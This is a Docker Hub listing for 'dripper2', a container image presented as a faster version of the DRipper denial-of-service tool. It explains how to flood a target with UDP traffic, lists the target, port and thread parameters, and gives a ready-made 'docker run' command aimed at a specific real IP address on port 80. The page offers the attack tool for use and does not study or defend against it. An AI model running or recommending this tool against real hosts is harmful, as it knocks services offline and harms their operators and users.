Sign inSign up

alexmon1989/dripper2

By alexmon1989

Updated over 4 years ago

Modernized version of Dripper

Image
0

211

alexmon1989/dripper2 repository overview

Description

This is an optimized version of DRipper. Here is original code: https://gist.github.com/scamp/33807688d0ebdcfbd4c29a4b992a8b54, you can see there a lot of cons like extra requests to Facebook and validator.w3.com, trying establishing connection with attacked resource (but there is no need in it if you want to send a UDP packet). Also the old version is inefficient: you need run several processes to have your processor busy.

Usage

Params:

-s - IP;

-p - port (default 80);

-t - threads count. The most important setting. Try to keep the processor busy up to 100%.

docker run -ti --rm alexmon1989/dripper2:latest -s 178.172.163.130 -p 80 -t 100

Tag summary

Content type

Image

Digest

Size

76 MB

Last updated

over 4 years ago

docker pull alexmon1989/dripper2